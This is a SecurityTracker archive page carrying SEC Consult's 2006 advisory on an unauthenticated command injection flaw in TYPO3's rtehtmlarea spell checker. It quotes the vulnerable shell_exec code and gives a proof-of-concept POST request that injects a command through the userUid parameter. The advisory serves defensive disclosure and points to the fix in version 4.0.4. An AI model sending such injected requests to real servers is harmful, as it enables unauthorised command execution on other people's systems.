SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


Try our Premium Alert Service
 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service





Category:   Application (Forum/Board/Portal)  >   TYPO3 Vendors:   typo3.org
TYPO3 Input Validation Holes in 'rtehtmlarea' Sysext Let Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1017428
SecurityTracker URL:  http://securitytracker.com/id/1017428
CVE Reference:   CVE-2006-6690   (Links to External Site)
Updated:  May 20 2008
Original Entry Date:  Dec 20 2006
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 4.1beta, 4.0.0 - 4.0.3, and 3.7 and 3.8 with rtehtmlarea extension
Description:   A vulnerability was reported in TYPO3. A remote user can execute arbitrary code on the target system.

The 'rtehtmlarea' sysext invokes the 'aspell' utility and passes user-supplied input as an argument to a system call without properly validating the input. A remote user can send specially crafted data to execute arbitrary code on the target system.

The vulnerability resides in '/typo3/sysext/rtehtmlarea/pi1/class.tx_rtehtmlarea_pi1.php', which is called by '/typo3/sysext/rtehtmlarea/htmlarea/
plugins/SpellChecker/spell-check-logic.php' and can be exploited via the userUid parameter. Another parameter is also affected.

The vendro was notified on December 7, 2006.

D. Fabian and J. Greil of SEC-CONSULT reported this vulnerability.

The original advisory is available at:

http://www.sec-consult.com/272.html

Impact:   A remote user can execute arbitrary code on the target system.
Solution:   The vendor has issued a fixed version (4.0.4).
Vendor URL:  www.typo3.org/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  SEC Consult SA-20061220-0 :: Typo3 Command Execution Vulnerability

SEC-CONSULT Security Advisory < 20061220-0>
=======================================================================
                  title: Remote Command Execution in Typo3
                program: Typo3 Content Management System
     vulnerable version: 4.0.0 - 4.0.3
                         3.7 and 3.8 with rtehtmlarea extension
                         4.1beta
                 impact: critical
               homepage: http://www.typo3.com
                  found: 2006-11-21
                     by: D. Fabian / SEC-CONSULT / www.sec-consult.com
                         J. Greil  / SEC-CONSULT / www.sec-consult.com
         permanent link: http://www.sec-consult.com/272.html
=======================================================================

vendor description:
---------------

TYPO3 is a free Open Source content management system for enterprise 
purposes on the web and in intranets. It offers full flexibility and 
extendability while featuring an accomplished set of ready-made 
interfaces, functions and modules.

[Source: http://www.typo3.com]


vulnerability overview:
---------------

In version 4.0 and above, Typo3 includes a sysext named rtehtmlarea.
The extension can optionally also be installed on Typo3 versions below
4.0. This RTE HTML Editor allows spell checking, for which it uses the
command line tool 'aspell'.

When this program is called, unvalidated user input is used as argument 
to the system call. Login to the backend is /not/ required to exploit 
this vulnerability. 

This allows an attacker to execute arbitrary commands on the target
system.


vulnerability details:
---------------

The affected script resides in /typo3/sysext/rtehtmlarea/htmlarea/
plugins/SpellChecker/spell-check-logic.php which calls the vulnerable
script /typo3/sysext/rtehtmlarea/pi1/class.tx_rtehtmlarea_pi1.php.
It requires a GET parameter id with the pageid of an existing page.
When the POST parameter cmd is set to learn, the parameter userUid is
not validated and can be used by an attacker to inject code.

Here is the vulnerable code (line 208):
--- code ---
$AspellCommand = 'cat ' . $tmpFileName . ' | ' . $this->AspellDirectory
 . ' -a --mode=none' . $this->personalDictsArg . ' --lang=' .
 $this->dictionary . ' --encoding=' . $this->parserCharset . ' 2>&1';
print $AspellCommand . "\n";
print shell_exec($AspellCommand);
--- /code ---

There seems to be a second command execution vulnerability in the same
file in line 365. It is left as a task to the reader to exploit that
flaw.

For typo3 versions < 4.0, the rtehtmlarea extension is probably located
at /typo3/ext.


proof of concept:
--------------- 

Here is a sample POST request that writes a file 'shell.txt' into /tmp:

--- post request ---
POST /typo3/sysext/rtehtmlarea/htmlarea/plugins/SpellChecker/spell-
check-logic.php?id=1 HTTP/1.1
Host: www.typo3host.abc
User-Agent: none
Content-Type: application/x-www-form-urlencoded
Content-Length: 111

psell_mode=fast&to_p_dict=1&cmd=learn&userUid=test;+echo+'shell'+>+
/tmp/shell.txt+%23&enablePersonalDicts=true
--- /post request ---


vulnerable versions:
---------------

Versions 4.0 - 4.0.3 as well as 4.1beta seem to be vulnerable to the 
described attack. Also vulnerable are versions 3.7 and 3.8 if the 
rtehtmlarea extension is installed.
The issue has been resolved in version 4.0.4.


vendor status:
---------------
vendor notified: 2006-12-07
vendor response: 2006-12-07
patch available: 2006-12-20
coordinated disclosure: 2006-12-20

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH

Office Vienna
Blindengasse 3
A-1080 Wien
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 15
Mail: research at sec-consult dot com
www.sec-consult.com 

EOF Daniel Fabian / @2006

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2018, SecurityGlobal.net LLC